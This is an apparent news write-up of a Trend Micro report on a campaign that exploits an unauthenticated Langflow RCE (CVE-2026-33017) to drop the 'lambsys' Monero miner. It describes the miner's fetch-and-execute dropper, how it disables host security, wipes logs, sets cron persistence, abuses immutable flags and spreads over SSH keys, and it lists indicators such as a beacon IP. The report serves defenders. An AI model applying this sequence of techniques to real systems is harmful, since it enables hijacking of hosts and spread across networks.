"In this campaign, a single line of Python code evaluated inside an unauthenticated Langflow API endpoint pulls down a shell script, fetches a miner binary, and launches it detached," Trend Micro researchers Simon Dulude and John Zhang said in a technical report published last week.
CVE-2026-33017 and the March–April campaign
Threat actors weaponized CVE-2026-33017 — an unauthenticated remote code execution vulnerability in Langflow rated CVSS 9.3 — to deliver a Monero cryptocurrency miner to exposed AI application endpoints. Trend Micro observed the activity over a 19-day window between March 27 and April 15, 2026. The abuse relied on invoking an unauthenticated Langflow API endpoint to execute a single line of attacker-controlled Python that pulled down and executed a remotely hosted shell script.
How the dropper and "lambsys" binary operate
The shell script acted as a dropper whose primary task was to determine whether an ELF binary named "lambsys" was already running. If not present, the dropper fetched the binary using curl or wget and launched it as a detached process. The "lambsys" executable is written in Go and was observed performing several stages: disabling host controls, terminating competing miners, wiping traces, establishing persistence via cron, and fetching a TAR archive that contained a bespoke XMRig miner which the binary then executed and removed.
Persistence, evasion, and lateral movement
The binary attempts to disable multiple host security mechanisms, including AppArmor, Ubuntu's Uncomplicated Firewall, iptables, SELinux, the kernel NMI watchdog, and Alibaba Cloud's Aliyun agent, before applying operational changes. It issues a cascade of short-lived shell subprocesses — a design that Trend Micro summarized as trading "stealth for reliability" by isolating individual commands so failures do not abort the whole sequence. The malware also removes system logs and manipulates file attributes: it removes the immutable attribute from files and directories such as "~/.ssh/," "~/.ssh/authorized_keys," "/etc/crontab," and "/etc/ld.so.preload," makes changes, and then reapplies the immutable flag to "/tmp/" and "/var/tmp/."
Lateral spread, operational telemetries, and pool selection
Once running, the binary spreads to other systems by reusing SSH keys available on the compromised host, effectively turning a single exposed Langflow instance into a broader pathway for compromise. It also reaches out to external services for operational decision-making: the malware beacons to an external server at 83.142.209[.]214:80 and requests ipinfo[.]io to obtain the host's public IP and location. Trend Micro noted two operational uses for that geolocation: selecting a nearby mining pool to reduce latency and maximize hash rate, and geo-fencing to exclude victims in particular regions.
What this means for technologists, enterprises, and cryptominer operators
- Technologists and security teams: watch for indicators tied to the lambsys binary, the use of one-line Python evaluations against unauthenticated Langflow endpoints, and outbound connections to 83.142.209[.]214:80 and ipinfo[.]io. The observed sequence includes pkill commands against competing miners, chattr +i usage to protect malicious files, cron-based persistence, and removal of system logs — specific behaviors security tooling can monitor for.
- Affected enterprises and procurement leaders: exposed AI application endpoints running Langflow present a new front door into networks. Trend Micro emphasized that although the payload is recognizable, "the delivery vector is not," and noted prior exploitation of Langflow vulnerabilities — including CVE-2025-3248 used in June 2025 to distribute the Flodrix botnet — underscoring the risk of unpatched or internet-facing AI app infrastructure.
- Adversaries and cryptominer operators: the campaign shows active iteration. Trend Micro found an earlier artifact of this binary compiled in May 2024, indicating the operator has been developing the family for over two years and adapting it to evade detection and remove rival mining operations.
Trend Micro's assessment is blunt: "This cryptocurrency-mining campaign shows how exposed AI application endpoints are becoming another route into enterprise environments." The combination of a high-severity unauthenticated RCE, straightforward remote fetch-and-execute payloads, and an emphasis on both persistence and lateral movement turns Langflow exposures into a strategic foothold for commodity cryptomining operators. As defenders review Langflow instances and related telemetry, the campaign underscores that AI-focused infrastructure can be a vector even when the ultimate payload is a familiar miner.
